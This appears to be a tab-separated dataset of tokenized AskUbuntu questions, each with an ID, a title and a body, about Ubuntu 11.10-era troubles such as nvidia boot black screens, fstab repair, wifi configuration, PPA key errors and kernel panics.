83140	x plays a gambling game	i formatted my whole hard drive , and installed elementary os ( ubuntu 10.10 ) on it in an attempt to get rid of all the problems . it failed . every since i installed the nvidia-current drivers i first need to boot into recovery mode , and run sudo nvidia-xconfig before booting the system in the normal way . if i do n't do this , it will just stop at a black screen after the boot screen , responding to nothing but ctrl+alt+delete and the power button . when i boot the system after running the nvidia-xconfig command i can just start working as usual . update i suspect it 's got something to do with plymouth . i shall have to try it again before i can confirm it , but removing the quiet and splash parameters from the kernel line in /boot/grub/grub.cfg seems to help . but still , i like my plymouth screen . a black screen with text rolling over it ( or without the text ) does n't attract me much . update it seems this has n't got anything do do with it , and if it does , it only made things worse . i had to reboot for a full 15 minutes today before i finally got my login screen . anything that helps would be greatly appreciated , because this is getting extremely annoying . also , i 'm not so sure anymore if nvidia-xconfig is at all related to this problem . today i tried running nvidia-xconfig as usual , and it did n't work : s also i checked what was the difference between the old and the newly genereated /etc/x11/xorg.conf file using diff . conslusion : there was n't any difference . things like this also wo n't do the idea that open-source and free software are `` cheap , and crappy alternatives for other pieces of software '' and that `` they are in fact so bad that they can give them away for free because nobody would want to pay any money for it '' any good . update i think it must be just totally random . most of the times it stops at the black screen , and there 's about a 1 out of 20 chance that it works . some log files /home/robin/.xsession-errors : http : //minus.com/mstipa8du # 3 /var/log/boot.log : http : //minus.com/mstipa8du # 4 /var/log/xorg . * : http : //minus.com/mstipa8du # 5
83142	move existing ubuntu install to flash drive ?	is it possible to move my installed copy of ubuntu 11.10 from my laptop 's internal hard drive to a bootable flash drive ?
83144	how to get back gnome 2.x & gtk 2.x in 11.10 ?	i would like to get back my gnome 2 desktop and gtk 2 and it 's applications and also gdm instead of the new one . how is this achieved ?
83145	hp probook 4530s fan constantly running	i have installed ubuntu 11.10 successfully and everything works perfectly except the fan , it is working constantly and it has nothing to do with the cpu because if i do n't open any programs it will remain at high speed . i figured it may be because of amd/ati , i tried different ways of installing it manually and even automatically via ubuntu itself but never worked ! is there a ( basic if possible ) way of fixing this ? maybe controlling the fan speed would do the trick .
83148	why does gedit print cover pages ?	i am printing a program listing from gedit ok but am also getting a cups cover page before and after the listing . an annoying waste of paper etc . i have just started using ubuntu , so this may have nothing to do with the version . can someone help me ? i have checked system-config-printer and made sure `` starting banner '' is set to none i have reloaded the drivers and the cover pages are gone . however , the filename and first line of code are now omitted from the print-out . if i create a pdf file , all details are there . short of buying a new printer , is there anything i can do ?
83151	fan speed goes up when opening gnome image viewer	maybe someone can help me to control the fan speed of my dell vostro 3450 with ubuntu 11.10 x64 installed . when i open gnome image viewer my fan speed is going up and spinning very fast . i would like to know the reason why it does this .
83152	rhythmbox does n't show cd track titles	let 's say i want to rip a cd . i open up rhythmbox and insert the cd . but rhythmbox does n't show the track titles . it just says unknown audio . it is an original cd , and i have internet . the titles show up fine in banshee ( but i prefer rhythmbox ) . i tried to google the problem and i found a cddb plugin , but i could n't get it installed . also , the settings button in the music preferences is greyed out . how can i fix this ? how can i set up the bitrate for my cd imports ? ( i am using the latest version of rhythmbox downloaded from ubuntu software center , ubuntu 11.10 . )
83154	ca n't get the screen 's brightness to work properly in macbook pro	when i turn the computer on the brightness is at it 's maximum , but when i try to decrease it a little , the light gets very low and i ca n't increase it until i restart .
83155	how do i set up autologin on kdm-config when my home directory is encrypted ?	how do i set up autologin on kdm-config when my home directory is encrypted ? if i just activate on kde settings ' login manager i get an error and x server crashes . i tried updating , but still the same issue .
83158	how to use lightdm in 10.04 ?	i really like oneiric 's log in screen , and i would like to get it for lucid . can someone help show me how ? thank you ,
83160	desktopcouch-ubuntuone installation failure	i installed into ubuntu 11.10 and got message '' desktopcouch-ubuntuone could not be installed '' ? ? ? seems to work ok i.e. , i can place a file in the folder and it 's uploaded into the `` cloud '' and i can access it in windows .
83161	use ffmpeg to transform mp4 to same high-quality avi file ?	i would like to use ffmpeg to transform an mp4 video file into avi but with the same quality , even if it takes up more space . if i simply do : ffmpeg -i file.mp4 file.mp4.avi the resulting avi file is very low-quality and pixelated . how can i do this transformation while keeping the video and audio quality ?
83165	how to setup wifi using the command-line ?	how do i setup wifi using the command line ? i need to setup as following , but its failed : target : security : wep network name : wifi59/7 key/password : xyz tried and failed : sudo iwconfig wlan0 mode managed sudo iwconfig wlan0 channel 11 sudo iwconfig wlan0 essid wifi59/7 sudo iwconfig wlan0 key xyz error for wireless request `` set encode '' ( 8b2a ) : set failed on device wlan0 ; invalid argument .
83171	how do i set an extra ip for an existing interface ?	i have an interface eth0 , and i wish to give it an extra virtual ip . i achieve this by the following : ifconfig eth0:0 ip.address.goes.here netmask subnet.address.goes.here this works fine , however , when i reboot , this is lost . i have tried editing /etc/network/interfaces to add the following : auto eth0:0 iface eth0:0 inet static address ip.address.goes.here netmask subnet.address.goes.here however , upon rebooting , the static ip for eth0 is loaded fine , but , the eth0:0 virtual ip is not loaded at all . so , how can i permanently add the eth0:0 virtual ip ?
83172	repairing the fstab	i recently changed my /home to another partition and after it caused problems ( i had it formatted as ntfs ) i wish to change it back to it 's original location . i changed the fstab listing for /home to use the uuid for the ext4 partition but it still causes problems . on startup i get `` unable to mount /dev/sda5 '' and `` unable to mount /dev/sdc5 '' . i push 's ' to skip and get to the login screen where i can sometimes log into my session and sometimes the screen goes black then back to the login screen . i am now making this post using the guest account . blkid gives the following info : /dev/sda1 : label= '' additional windows stuff '' uuid= '' 201821d41821aa2c '' type= '' ntfs '' /dev/sda5 : uuid= '' f1d24581-7850-4a0f-93cd-7e4d24dade1d '' type= '' swap '' /dev/sda6 : uuid= '' 1eaa73bd-8758-4899-a4d2-2a992a2ea762 '' type= '' ext4 '' /dev/sdb1 : label= '' master disk '' uuid= '' a0c41dd1c41daa94 '' type= '' ntfs '' /dev/sdb5 : label= '' my documents '' uuid= '' 0f26083d43d41058 '' type= '' ntfs '' /dev/sdc1 : label= '' elements '' uuid= '' cab427abb4279949 '' type= '' ntfs '' /dev/sdd1 : label= '' ubuntu11-10 '' uuid= '' 19ec-2249 '' type= '' vfat '' sda1 is in physical position of ide0 and so has grub and some other stuff on it . sda5 is my swap partition . sda6 is my ubuntu install and where i 'm trying to return my /home to . sdb1 is in physical position of ide1 and has my windows install . sdb5 is where i moved /home to for a short time . sdc1 is a usb drive . sdd1 is my liveusb install drive with 11.10 on it . currently my fstab file looks like this : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdc6 during installation uuid=1eaa73bd-8758-4899-a4d2-2a992a2ea762 / ext4 defaults 0 1 # swap was on /dev/sdc7 during installation uuid=92f46648-958f-40a1-b96b-607081c063a7 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sdb2 /home ntfs defaults 0 0 /dev/sdb1 /media/sdb1 ntfs defaults 0 0 /dev/sda5 /media/sda5 ntfs defaults 0 0 /dev/sdc5 /media/sdc5 ntfs defaults 0 0 /dev/sdb5 /media/sdb5 swap defaults 0 0 /dev/sdd1 /media/sdd1 vfat defaults 0 0 is there a way to completly start from scratch without stuffing the system or will i have to manually remount the affected drives ? i do n't mind re-installing if i have too , but who enjoys that ? once fixed , i think i will use simlinks to merge my 'my documents ' and /home ! i am a windows veteran but a linux numpty ! i do have 'storage device manager ' installed .
83174	adding user with custom home directory , and setup mysql user/password	i want to have a way of easily adding users with a custom home directory . also setting up an ftp & mysql username/password . how might be an good way of doing that ? i am thinking something like a script run like : setupuser [ username ] then password will be generated and used for ubuntu/ftp/mysql
83176	how do i quickly switch between workspaces in unity ?	i 'm using ubuntu 11.10 with unity and would like to switch between workspaces with a keyboard shortcut . is there any way to achieve this ?
83177	what 's new in gnome panel 3.2 ?	gnome panel , also known as ubuntu/gnome classic , is available in a brand new version for gnome 3 . one of the things i like about it , is that when you use vertical panels , applets are made vertical as well , including text . this is something i 've longed for for many years . that 's one of the benefits of gtk3 . another change is that you now have to press alt+middleclick to move stuff around . that 's also nice , though it does take some getting used to . this got me thinking that there might be other things that are n't so easily discovered . so i thought i 'd ask the experts ! what other things are new , and what can we expect in the near future ?
83181	how can i contact the developers to ask to upload new software in the usc ?	bzflag is a free , open source , online multiplayer video game . now the problem is : in the bzflag website under the section download , http : //bzflag.org/ you can download the windows .exe and the source for the gnu/linux systems ... i have learned how to compile software from the source using the terminal , but it would be great if thousands of beginners and not so expert persons could check and download the latest bzflag version from the ubuntu software center . this also because in the usc there 's a bzflag package but the version 2.0.16 that is n't compatible with the newest version . so , nobody can use old versions like 2.0.16 or 2.0.14 because the client & server are n't compatible with the new 2.4.x version . i have seen the opportunity of the developers to publish their own software here http : //developer.ubuntu.com/ but ... how can i contact the developers of ubuntu to ask to upload new software on the usc ?
83184	how to put .iso file to usb ?	i want to try out linux mint . i am on ubuntu 11.10 now . how can i mount .iso file on usb ? and also , will my other files disappear in usb when i mount it ? thank you .
83186	some applications always open on the secondary screen ?	i have a dual screen setup . some applications always open on my secondary screen . how can i fix this behavior ? in unity 3d there 's a setting in compizconfig to open windows centered on current desktop . i 'm using oneiric 64-bit .
83187	ca n't create wifi network	i have 2 laptops : first with wired connection and second is not . when i try to create wireless network to share internet with second computer , looks like everything is fine ( created network is available on first computer ) , but the second lapton does n't see this network in it 's available networks , but see some others ( not mine ) , so the second computer can receive wifi . maybe i missed something . maybe i need some external device to my first laptop to seed data ? thanks !
83198	ltsp thin client boots to a command prompt instead of a gui	when i install edubuntu 11.10 with ltsp , it installs fine . when i go to boot from the thin client it opens a terminal ( looks like ms-dos ) on the thin client , but the ltsp server shows a gui . i am new to linux ; can someone help me ?
83200	how do i configure nagios with audio notifications ?	i need help to configure nagios to send an audio notifications for every errors that nagios detects on the network . i 've found on internet to realize that i need to install festival but i do n't know how to configure nagios . is there some one who can hel me ? nagios core is 3.3.1 .
83202	where are screenlets configuration files ?	i have just installed screenlets and the extra widget package thru software center . now i have gotten a little problem with a widget and therefore i want to reset the screenlet widget . however i can not find the configuration files . i have looked in /home/~/.screenlets , but the folder is empty . does anyone knows where the config/properties for the widgets are stored ?
83206	why do i have to add a ppa twice ( once to add it to the list of repo , second time to fix a bad gpg )	i notice the following : i add a ppa using add-apt-repository , for example the wine ppa , mozilla security , nvidia drivers , etc.. when i go to the update manager and tell it to check for updates it throws me a ppa error . to solve the error i add the same ppa again . why do i have to add the ppa again ( this also can be done by adding the received key alone with apt-key ) but why does this problem happen anyway . update - i have to add two small details . first that removing the previous ppa that has the gpg problem and then adding it up again will have the same effect as adding it twice since adding it again ( without removing it first ) will overwrite the same ppa . but still in the end you would have to add it twice . second using the update manager ( clicking on the settings button and going to the software sources ) to add the ppa has the same problem as adding it in the terminal . in both cases you have to add it twice . i can confirm this for nvidia ppa , mozilla security ppa , wine ppa and any other ppa i started trying in 11.10 . i have to add that this issue was not a problem in 11.04 . it started with 11.10 . somehow there is some minor details that trying to add a ppa the first time does not trigger the key for it . doing it a second time triggers the key and you can use the update manager ( or any other updater ) without having a warning popup saying something about a ppa problem . update 2 - i have tested several ppa . they all have the same problem adding them via the gui software sources or via the terminal add-apt-repository . i have to actually add them , run the update command in terminal or via gui and then add them again to solve the problem . does not matter from where i add them or update or add them again .
83207	regardless of battery charge , when unplugged ubuntu displays critical battery message and hibernates	regardless of battery charge , when unplugged ubuntu displays critical battery message and hibernates . i can only seem to change it to either shutdown or hibernate . this does not happen when using windows 7 on the same computer . windows 7 gives a good few hours on a full charge indicating that it is not a battery problem . any help ? i really do n't want to have to use windows but its kinda pointless having a netbook that does n't work when not plugged in ! i 'm using a toshiba nb250 and the most up to date 11.10 ubuntu distro . i use to get the critical battery message before on the previous ubuntu but it never shut down or hibernated my computer .
83208	display is cut-off and stuck at 640x480 ; can not detect monitor	i 've recently installed ubuntu 11.10 on my pc and i have a resolution problem . my screen resolution is set at 640x480 ( 4:3 ) and i ca n't see right the whole screen , the windows or the icons . the problem is that it does not have other options in monitor- > display so i can choose the right one , and i think that it ca n't detect my monitor - it says `` unknown '' ( i have a desktop with pentium4 , at 3ghz , asus motherboard and an nvidia geforce graphic card ) . xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 640 x 480 , maximum 640 x 480 default connected 640x480+0+0 0mm x 0mm 640x480 50.0* 320x240 51.0 lspci -v | grep vga vga compatible controller : nvidia corporation nv34 [ geforce fx 5200 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : prolink microsystems corp device 1152 flags : bus master , 66mhz , medium devsel , latency 248 , irq 16 memory at fd000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e8000000 ( 32-bit , prefetchable ) [ size=128m ] [ virtual ] expansion rom at fe9e0000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia_173 , nouveau , nvidiaf
83209	why ca n't i link my skype contacts with the rest in empathy ?	i 'm using skype in empathy thanks to telepathy-haze and pidgin-skype . i 've also added msn , jabber ( gtalk ) , and facebook . when i link contacts from msn , gtalk , and facebook , there 's no problem , but if i include a skype contact , either nothing happens or empathy crashes and after restarting i see that the skype contact was never linked . is the fact that skype is not natively supported in telepathy a problem for linking ?
83211	no music preview on mouse hover over music file as in ubuntu 11.04	no music preview on mouse hover over music file as in ubuntu 11.04 . i can not see the small play icon on the top of the music file when i place my mouse over it .
83215	libpython2.6 removed and now i have problem	i am new in ubuntu and generally in linux . i did n't , i think , a great mistake yesterday and i would like your help . tried to setup virtualbox and i had an old version of libpython ( 2.6 ) , and virtualbox required 2.7 . i add it and then i though that would be fine to remove the older version ( 2.6 ) . i did it through package manager and when i applied the changes a lot of things was removed but i could n't do something . when i restarted i got the following message `` ubuntu is running in low graphics mode '' . is it possible to bring the machine in the previous state or reinstall the removed packages ?
83216	can not boot livecd/usb sessions on a particular machine ( `` kernel bug '' error )	i cant install ubuntu 11.10 nor xubuntu 11.10 on my computer , i tried using bootable usb 's and cd 's , but always after the ubuntu bootscreen , the installer shows a console with many lines like : 5.056005 cr2 0000000000002 kernel bug my bootables usb 's and cd 's works perfectly on other computers . my computer specs are : motherboard : intel d865perl processor : intel pentium 4 ht 3.0ghz ( hyperthreading enabled ) ram : 1.5gb ( 2x512mb + 2x256mb ) harddrive : samsung 160gb sata ii seagate 120gb sata i graphics card : ati radeon 9250 agp 128mb i know my computer is a bit old , but ubuntu 10.04 works perfectly , i also tried removing some ram modules and removing my harddrives but ubuntu 11.10 ( nor xubuntu 11.10 ) cant boot even in live cd . i dont want to install ubuntu 10 and update it to ubuntu 11.10 , what can i do to install ubuntu 11.10 or xubuntu 11.10 on my computer ?
83220	undo 11.10 install alongside windows 7	i have 11.10 installed on a desktop now . i wanted to install on my toshiba l300 laptop alongside windows 7 with a view to completely moving over to 11.0 and scrapping windows 7 . this install has failed a few times - issues submitted to launchpad . what i want to do is undo whatever the ubuntu install has done to my laptop so i can try again .
83224	shutdown taking a lot of time	whenever i shutdown in my ubuntu 11.10 box , the icons are changing to the default gnome icons and it is taking a lot of time to shutdown . what can i do to fix this ?
83226	is there any tweak to bring back emblems in nautilus ?	i read the following dev email removing 'backgrounds and emblems ' and when i read this part : note that this does not completely remove the ability for extensions ( e.g . dropbox ) to add emblems programmatically by using the libnautilus-extension library , just the user-added emblems from the properties dialog/emblems sidebar . there is ability to bring emblems programmatically . so , how can i use libnautilus-extension library to add some emblems like dropbox does ? or is there any tweak tool for this ?
83227	how can i install a specific older version of firefox and keep it from automatically updating ?	i wrote a bash script to configure a suite of tools for continuous integration on top of ubuntu 10.04.2 . the script recently stopped working and i tracked the problem down to the newer version of firefox that was just released . the image of ubuntu that i 'm starting with already has firefox installed , but i need a version in between what it comes with and the latest . here 's the code i was using : sudo add-apt-repository ppa : mozillateam/firefox-stable sudo apt-get update echo `` y '' | sudo apt-get install firefox how can i instead install firefox 7.0.1 and keep it from automatically upgrading to the latest version ? if i can , i 'd like to avoid installing firefox manually , so i can more easily use apt-get later , once the issue i 'm running into gets resolved .
83228	how do i get ubuntu to stop hanging periodically ?	ever since ubuntu 11.04 , i have been experiencing random system hangs ( i 'm currently running 11.10 ) . reisub does not recover the system and a hard-boot is required . scanning all the system logs ( kern.log , syslog , dmesg ) does not reveal anything remarkable to me other than a number of ecryptfs_encrypt_page errors which appear at 30 second intervals . for example , here is the tail end of dmesg at the moment : < snip/ > [ 2586.952174 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 2586.952179 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x000000000000001f ] ) [ 2586.952210 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 2586.952212 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x000000000000001f ] ) [ 2586.952244 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 2586.952246 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x000000000000001f ] ) [ 2616.952218 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 2616.952222 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x0000000000000020 ] ) [ 2616.952254 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 2616.952256 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x0000000000000020 ] ) [ 2616.952287 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 2616.952289 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x0000000000000020 ] ) [ 2646.952211 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 2646.952216 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x0000000000000021 ] ) [ 2646.952248 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 2646.952250 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x0000000000000021 ] ) [ 2646.952281 ] ecryptfs_encrypt_page : error attempting to write lower page ; rc = [ -5 ] [ 2646.952283 ] ecryptfs_writepage : error encrypting page ( upper index [ 0x0000000000000021 ] ) the hang i experience is characterized by : looping sound non-responsive keyboard/mouse screen freeze alt + sysreq + reisub does not work my exact issue seems to be described in another askubuntu question , however , i do n't believe i 'm experiencing a hardware problem . i dual-boot with windows 7 and windows 7 has been working flawlessly . i have tried both unity as well as gnome-shell , and both end up hanging . the hang is not predictable and i 'm not sure what causes it . i thought it was being caused by streaming video from my file server ( since that is what i most frequently do in ubuntu and that is when the hangs were occurring ) , but last week the system hung despite playing a video file locally . it also hung once while doing nothing ( only the browser was running ) . for most of this year i 've resorted to spending my time in windows 7 as a result , but i 'd really love to get ubuntu stable again . any advice on diagnosing this issue ?
83230	how do i lock a package in the software centre ?	i know that you can lock a package using the command line and synaptic - is there a way to do so using the software centre ?
83232	remove ubuntu 11.10 from dual boot windows xp without xp cd ?	i installed ubuntu on a old windows xp computer using dual boot , i have no xp cd and desperately need to remove it ! easybcd does not work on windows xp , if i just delete the ubuntu partition all hell breaks loose and i have to reinstall ubuntu to get my xp back . please help me i am only 12 and i have made a stupid error on my mum and dads computer and will get into serious trouble if i dont fix it soon ! . extra information : i use the gnu boot loader to choose my operating system , but my mum and dad need my help to open a word document , they have only just grasped double clicking ! i installed it off a cd that i made , the computer is 64-bit amd athlon with one 160gb hard drive , 512mb ram and a sis mirage2 128mb shared video card . its a compaq presario .
83233	why does jdownloader refuse to open ?	i 've just install jdownloader but i do not understand how it works . if i add it click on the jdownloader icon , nothing happens . i installed this way sudo add-apt-repository ppa : jd-team/jdownloader sudo apt-get update sudo apt-get install jdownloader in terminal i get this : /home/user/.jdownloader/config/packagemanager.cfg ( no such file or directory ) in /home/ [ myusername ] /.jdownloader , i can see a jdupdate.jar but no /config/packagemanager.cfg i have java 6.26 installed . one month later and several extra hours lost , i still have n't managed to install jdownloader on my ubuntu 11.10 it seems all the tutorials are outdated ! did somebody manage ? note : it took me less than 5 mn to install on osx . what the hell with ubuntu ?
83243	why are no changes to the main menu in unity possible ?	why ca n't i add a menu item in the main menu or see an item property ? is unity the culprit ? i am using ubuntu 11.10 .
83251	ca n't see windows partition in nautilus	i am on ubuntu 11.10 , installed with wubi . i used to be able to access my windows partion from the list of devices in nautilus , but i no longer see it . what might b.e wrong ? running sudo blkid gives the following : /dev/loop0 : uuid= '' ef34b449-1330-4ac5-bb69-e1475c0b91da '' type= '' ext4 '' /dev/sda1 : label= '' pqservice '' uuid= '' d04c76d04c76b138 '' type= '' ntfs '' /dev/sda2 : label= '' system reserved '' uuid= '' ec4878594878248c '' type= '' ntfs '' /dev/sda3 : label= '' acer '' uuid= '' 54947a5a947a3e94 '' type= '' ntfs '' thanks .
83253	how to remove plymouth boot animation manager and keep the default boot screen	i am running ubuntu 11.10 32-bit . recently , i installed the plymouth boot screen to change the boot animation . now i would like to remove it . i want to revert to the default animation it was before i installed plymouth . however , i can not remove plymouth without removing several other critical packages . does anyone know how i can remove plymouth and revert to my original boot animation ?
83254	playing wmv files and asx files	i have a question about this page : http : //developer.ubuntu.com/resources/tutorials/all/diy-media-player-with-pygtk/ my question is about setting supported video and audio types ? do i have to have the codec installed on my computer in order for it to play ? i want to set it to play wmv files . how do i do this ? how do i download and install the codec onto my ubuntu from the terminal ?
83255	find file or directory in whole directory structure	how can i find a file with a specific name in bash . i want to search through the whole system . i tried with find , but that only work through one level .
83261	unable to get screen signal after purge fglrx	i thought that my ati driver was not running well so i wanted to re-instal it completely . i did : sudo apt-get remove -- purge fglrx* sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon and after a boot i wanted to intal the ati driver but at the boot no more signal to my screen . since , every time i turn on my pc it gets to purple screen and then screen shuts down ! note that : even if the screen is off , pc seems to be running almost well : i m still able to use my network to access data shared with nfs . using live usb i have no screen problem . i tried to plug my screen on an alternative output but it did not work . i tried ctrl+alt+f1 while being on purple screen but it does not do anything , screen shut down anyway . i m going to try the shift thing and learn from blackscreen wiki ...
83262	broadcom 4313 signal strength very low on an hp pavilion dv4	i have a hp pavilion dv4 4141us laptop running fresh ubuntu 11.10 . this laptop has a broadcom 4313gn chipset for the network card . the network card is using the brcmsmac driver . which , i heard else where on askubuntu that its the best driver to be using for this card . i can connect to my network , however i have extremely low network signal . right now i am right in front of the router , and i only get 72 % . if i go to the room directly behind the router 's wall , i get no signal , where as with windows 7 i get a nice 70 % percent . update : i use wep at home and an open wireless connection at work . both have same result . both are completely different routers . also you g what can i do ?
83263	kernel panic in version 3.0.0-13 prevents login ( `` vfs not syncing '' error )	i updated ubuntu 2 days ago and now i ca n't login , even in safe mode , since there 's a kernel panic ( 'vfs not syncing ' , something like that ) . i know this is a bug but i do n't want to reinstall everything again . is there some way to make ubuntu functional again ? the problem too is that i do n't have old kernels on my grub list , since it seems the update erased all of them . here 's a picture of the kernel panic at boot :
83266	can you install applications onto different partitions ?	i have a dell inspiron mini 10 netbook running windows , but i want to get ubuntu or some distro onto it . i have installed ubuntu 10.10 before and it runs flawlessly on it . so , the mini 10 has a 8gb ssd and i have put a 16gb sd card in the slot . i can save my own files onto the sd card , but i would like to be able to install apps onto the sd card rather than them just installing onto the default partition on the ssd . is it possible , remembering that when i install via the software packager i have no options where to install the program ? i remember how windows gave you that option of destination folder when installing . that 's what i want .
83268	how do i get root access to hard drive from livecd ?	ubuntu 11.10 has faffed up on me , it wont let me get passed the login-screen ( i have been searching around online the last two days and none of the proposed solutions worked ) as at this point i dont care to try to fix it i have booted the liveusb and need access to my files so i can move them to an external drive , the issue is i cant move , for example , .thunderbird , as i dont have permission so please , how can i get permission ? as in how do i get to enter password so i can move my files ( please dont confuse what i am asking , as on other forums that i have googled , people keep saying that you are root in a livecd session , this completely misses the point , i need root privilage to move the files from the harddrive , gksu nautilus doesnt give permission to move/copy files ) thanks in advance
83274	it is possible to easily upgrade the kernel in 10.04.3 to version 3.0.0 and newer ?	it is possible to easily upgrade the kernel in ubuntu 10.04.3 to version 3.0.0 and newer ?
83281	compatibility with the msi k7n2g motherboard ?	i have a msi 6570g ( k7n2g ) mainboard and just downloaded ubuntu 11.10 . it booted from the cd , when through the progress bar but at the end the display just showed colored stripes . the system works with xp pro sp3 . the video is just the on-board video
83282	midori wo n't install ?	i 've added the midori dev . ppas , but midori refuses to install in both synaptic and usc . take a look at the screenshot below :
83283	how do i make the public folder not appear in the home folder of new accounts ?	when i create a new user , how do i tell ubuntu not to create a public sub-folder ?
83286	why ca n't i choose ubuntu at boot ?	i installed ubuntu along side windows xp , and at the choose os screen my keyboard does n't work . i ca n't even hit enter to just start xp i have to wait for the count down . any ideas ?
83291	how do i white-list ganyremote 's tray icon ?	i 'm tinkering around with anyremote and its gtk client ganyremote , and i wonder whether anyone knows how one might go about white-listing the ganyremote tray icon . i know where the white-list is stored in dconf , i just do n't know what to put ( anyremote , ganyremote , anyremote , ganyremote , etc ... ) . p.s . : i 'm actually using pantheon 's wingpanel rather than unity , but i assume that the principle is the same here .
83292	making bootable usb drive	i have the windows 7 iso and i wanted to make a bootable flash drive out of it . i used to use unetbootin but they have now removed the option to show all drives . can anyone suggest another program that can make a bootable flash drive ?
83293	how can i install from a 9.04 live usb/dvd ?	i have a 9.04 ( jaunty ) iso burned to a usb stick ; it appears to be a `` live dvd '' . when i boot from it , i get a grub menu listing : ubuntu , with linux 2.6.35-generic ( this matches the system currently installed on the hdd ? ) ubuntu , with linux 2.6.35-generic ( recovery mode ) memory test ubuntu 9.04 , kernel 2.6.28-11-generic ( on /dev/sda1 ) ubuntu 9.04 , kernel 2.6.28-11-generic ( recovery mode ) ( on /dev/sda1 ) ubuntu 9.04 , memtest86+ ( on /dev/sda1 ) when i select ubuntu 9.04 , kernel 2.6.28-11-generic ( on /dev/sda1 ) , i arrive at the desktop of a 9.04 system . i want to wipe the hdd clean and install 9.04 . ( upgrading to something newer is not an option ; this version is required by a legacy application . ) how can i install from this live usb image ? i vaguely remember some incantation that i should be able to use in the booted system , but my google-fu is broken at the moment . i 'm comfortable with low-level commands , so if you want to recommend a more hard-core strategy , i 'm willing to roll with it without requiring a ton of detail ...
83296	unity 3d in 11.10 with virtualbox in os x ?	it is possible to run unity 3d in virtualbox on a mac ? i 'm having a horrible time with unity 3d in ubuntu 11.10 running in a virtualbox vm in os x . such a hard time , in fact , that i 'm about to give up and conclude that it simply is n't possible to use ubuntu 3d in a configuration like this . the problem with is that windows simply do not render . i 've found that killing nautilus makes the problem go away , but that 's really not much of a solution . i have installed the guest additions and am running the vm with 2048 mb ram , 128 mb video memory , and have enabled 3d acceleration . i 've tried all this on several macintoshes with no luck . unity 2d , on the other hand , works fine across the board . it 's also worth noting that i was able to run compiz on ubuntu 10.04 in the same vm environment with no problems . any advice or experience would be greatly appreciated .
83297	application is n't showing up in launcher	so i downloaded eclipse earlier today so i can start to learn the android sdk . i typically write java programs with vim from the command line but i was having trouble making the sdk work from the command line . anyways eclipse was begin weird so i uninstalled it with synaptic , then i reinstalled . now it seems to be working fine except i ca n't get eclipse to show up in the launcher ... is there anything i may be missing that would make the launcher show up ?
83298	error while reading shared library symbols for /lib/ld-linux.so.2	when i try and run these commands ( in order ) : gdb -tui main layout regs b main r s it gives me a ton of errors on the 'r ' command , giving the error in the title , so i ca n't even debug my program . it 's nothing complex , just a main.c file , a makefile , an asm.h and asm.s ( hence layout regs ) . if i run these commands on a slax vm , they work perfectly . why does n't ubuntu 11.10 work then ? p.s . the output is this : error in re-setting breakpoint 1 : register 41 is not available error while reading shared library symbols for /lib/ld-linux.so.2 : register 41 is not available error while reading shared library symbols for /lib/ld-linux.so.2 : register 41 is not available [ inferior 1 ( process 1844 ) exited normally ]
83301	installing tarball when you already have a package ( different versions )	i want to install cython so i installed the current package in the software center which is version 0.13 , now i want to install the tarball from the cython website - version 0.15 . if i just `` ./configure , make , make install '' the tarball , will it work well with the package ? i.e will i be able to later remove it with `` apt-get '' , or will it cause conflicts ? otherwise i can remove the package first and than install the tarball , but it wo n't be as convenient as having the package installed . what is the best practice in a case like this ?
83302	bluetooth dongle always inactive on toshiba satellite m645-s4050	i have a toshiba satellite m645-s4050 , and i bought a bluetooth dongle a while back ( my computer has no internal bluetooth ) before i installed ubuntu . in the top toolbar where the bluetooth icon is displayed ( with mail , battery , time , etc . ) , it shows that bluetooth is active . i had it working for a while ( and even then it would n't find my phone ) , but now when i go to the bluetooth settings page to connect , it says bluetooth is inactive .
83309	manual uninstall of wubi failed , stuck and can not reinstall	i want to reinstall wubi on windows 7 ( asus 1215n ) . i followed the uninstall instructions at this ubuntu wiki page . i get this error message : error executing command > > command=c : \windows\system32\bcdedit.exe /delete ( 1ed40def-63a5-11f5-88ad-a65437514e86 ) /f > > retval=1 specified entry the system can not find the file specified > > stdout= there is a log file that shows a traceback of python programs in lib/wubi . what can i do now to get rid of the vestiges of my previous wubi so i can reinstall ?
83312	performance issues with radeon hd 5450	i have a radeon hd 5450 graphics card . running ubuntu 10.04 . when i install the proprietary graphics drivers i get good video rendering ( youtube ) and appropriate screen resolution . but when i open a browser window and scroll or move a window around i get terrible lagging which drives me nuts . i now run in low graphics mode . i get poor video rendering and poor screen resolution but no scrolling issues or lagging windows . i run in low graphics mode because this is priority for me . i do n't watch videos or care what my screen looks like . i just do n't want lagging scrolling . any help ?
83313	unable to install unity web search lens	i receive this error : unity-place-websearch : depends : gir1.2-unity-3.0 but it is not installable using 11.10 , here 's how to replicate : sudo add-apt-repository ppa : cscarney/unity-web-place sudo apt-get update sudo apt-get install unity-place-websearch
